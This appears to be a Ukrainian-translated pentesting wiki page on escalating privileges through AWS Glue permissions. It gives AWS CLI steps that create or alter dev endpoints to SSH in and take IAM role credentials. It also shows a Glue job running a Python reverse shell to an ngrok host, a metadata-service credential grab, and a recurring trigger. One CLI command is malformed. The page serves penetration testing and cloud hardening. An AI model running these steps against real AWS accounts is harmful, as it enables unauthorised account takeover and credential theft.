glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Користувачі з цими дозволами можуть налаштувати нову розробницьку точку доступу AWS Glue, призначивши існуючу службову роль з конкретними дозволами для цієї точки доступу.

Після налаштування зловмисник може виконати SSH на екземпляр точки доступу та вкрасти IAM-підтвердження призначеної ролі:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Для забезпечення конфіденційності рекомендується використовувати облікові дані IAM зсередини віртуальної машини Glue.

Потенційний вплив: Підвищення привілеїв до вказаної ролі служби glue.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Користувачі з цим дозволом можуть змінювати існуючу точку розвитку Glue, ключ SSH, що дозволяє доступ до SSH. Це дозволяє зловмиснику виконувати команди з привілеями ролі, приєднаної до точки розвитку:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Потенційний вплив: Підвищення привілеїв до ролі служби glue, яка використовується.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Користувачі з iam:PassRole, поєднано з glue:CreateJob або glue:UpdateJob, і або glue:StartJobRun або glue:CreateTrigger можуть створювати або оновлювати роботу AWS Glue, прикріплюючи будь-який обліковий запис служби Glue, та запускати виконання роботи. Можливості роботи включають в себе виконання довільного коду Python, який може бути використаний для створення зворотного shell. Цей зворотний shell можна використовувати для виведення IAM-підтвердження ролі, прикріпленої до роботи Glue, що призводить до потенційного несанкціонованого доступу або дій на основі дозволів цієї ролі:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Потенційний вплив: Підвищення привілеїв до вказаної ролі служби glue.

glue:UpdateJob

Лише з дозволом на оновлення атакуючий може вкрасти облікові дані IAM вже прикріпленої ролі.

Потенційний вплив: Підвищення привілеїв до прикріпленої ролі служби glue.

Посилання

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/